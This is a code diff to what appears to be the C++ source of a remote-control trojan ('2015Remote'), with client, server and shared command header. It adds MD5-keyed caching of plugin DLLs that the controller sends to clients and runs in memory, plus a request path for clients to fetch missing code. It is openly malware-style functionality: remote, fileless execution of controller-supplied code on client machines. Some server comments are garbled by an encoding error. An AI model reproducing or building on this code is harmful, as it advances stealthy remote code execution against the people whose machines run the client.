diff --git a/client/KernelManager.cpp b/client/KernelManager.cpp index eb4a6c7..83359a8 100644 --- a/client/KernelManager.cpp +++ b/client/KernelManager.cpp @@ -198,13 +198,26 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength) { case CMD_EXECUTE_DLL: { #ifdef _WIN64 + static std::map> m_MemDLL; const int sz = 1 + sizeof(DllExecuteInfo); - if (ulLength <= sz)break; + if (ulLength < sz)break; DllExecuteInfo* info = (DllExecuteInfo*)(szBuffer + 1); + const char* md5 = info->Md5; + auto find = m_MemDLL.find(md5); + if (find == m_MemDLL.end() && ulLength == sz) { + // 第一个命令没有包含DLL数据,需客户端检测本地是否已经有相关DLL,没有则向主控请求执行代码 + m_ClientObject->Send2Server((char*)szBuffer, ulLength); + break; + } + BYTE* data = find != m_MemDLL.end() ? find->second.data() : NULL; if (info->Size == ulLength - sz && info->RunType == MEMORYDLL) { + if (md5[0]) m_MemDLL[md5] = std::vector(szBuffer + sz, szBuffer + sz + info->Size); + data = szBuffer + sz; + } + if (data) { PluginParam param(m_conn->ServerIP(), m_conn->ServerPort(), &g_bExit, m_conn); - CloseHandle(CreateThread(NULL, 0, ExecuteDLLProc, new DllExecParam(*info, param, szBuffer + sz), 0, NULL)); - Mprintf("Execute '%s'%d succeed: %d Length: %d\n", info->Name, info->CallType, szBuffer[1], info->Size); + CloseHandle(CreateThread(NULL, 0, ExecuteDLLProc, new DllExecParam(*info, param, data), 0, NULL)); + Mprintf("Execute '%s'%d succeed - Length: %d\n", info->Name, info->CallType, info->Size); } #endif break; diff --git a/common/commands.h b/common/commands.h index 847148c..724b729 100644 --- a/common/commands.h +++ b/common/commands.h @@ -675,7 +675,8 @@ typedef struct DllExecuteInfo { int Size; // DLL 大小 int CallType; // 调用方式 char Name[32]; // DLL 名称 - char Reseverd[56]; + char Md5[33]; // DLL MD5 + char Reseverd[23]; }DllExecuteInfo; enum diff --git a/server/2015Remote/2015RemoteDlg.cpp b/server/2015Remote/2015RemoteDlg.cpp index bbaa92c..856db4c 100644 --- a/server/2015Remote/2015RemoteDlg.cpp +++ b/server/2015Remote/2015RemoteDlg.cpp @@ -223,11 +223,13 @@ DllInfo* ReadPluginDll(const std::string& filename) { } // 璁剧疆杈撳嚭鍙傛暟 + auto md5 = CalcMD5FromBytes(buffer + 1 + sizeof(DllExecuteInfo), fileSize); DllExecuteInfo info = { MEMORYDLL, fileSize, CALLTYPE_IOCPTHREAD, }; memcpy(info.Name, name.c_str(), name.length()); + memcpy(info.Md5, md5.c_str(), md5.length()); buffer[0] = CMD_EXECUTE_DLL; memcpy(buffer + 1, &info, sizeof(DllExecuteInfo)); - Buffer* buf = new Buffer(buffer, 1 + sizeof(DllExecuteInfo) + fileSize); + Buffer* buf = new Buffer(buffer, 1 + sizeof(DllExecuteInfo) + fileSize, 0, md5); SAFE_DELETE_ARRAY(buffer); return new DllInfo{ name, buf }; } @@ -1639,6 +1641,17 @@ VOID CMy2015RemoteDlg::MessageHandle(CONTEXT_OBJECT* ContextObject) } switch (ContextObject->InDeCompressedBuffer.GetBYTE(0)) { + case CMD_EXECUTE_DLL: // 璇锋眰DLL + { + DllExecuteInfo *info = (DllExecuteInfo*)ContextObject->InDeCompressedBuffer.GetBuffer(1); + for (std::vector::const_iterator i=m_DllList.begin(); i!=m_DllList.end(); ++i){ + DllInfo* dll = *i; + if (dll->Name == info->Name) { + return m_iocpServer->OnClientPreSending(ContextObject, dll->Data->Buf(), dll->Data->length()); + } + } + break; + } case COMMAND_PROXY: { g_2015RemoteDlg->SendMessage(WM_OPENPROXYDIALOG, 0, (LPARAM)ContextObject); @@ -2625,7 +2638,7 @@ void CMy2015RemoteDlg::OnDynamicSubMenu(UINT nID) { Buffer* buf = m_DllList[menuIndex]->Data; int iItem = m_CList_Online.GetNextSelectedItem(Pos); CONTEXT_OBJECT* ContextObject = (CONTEXT_OBJECT*)m_CList_Online.GetItemData(iItem); - m_iocpServer->OnClientPreSending(ContextObject, buf->Buf(), buf->length()); + m_iocpServer->OnClientPreSending(ContextObject, buf->Buf(), 1 + sizeof(DllExecuteInfo)); } LeaveCriticalSection(&m_cs); }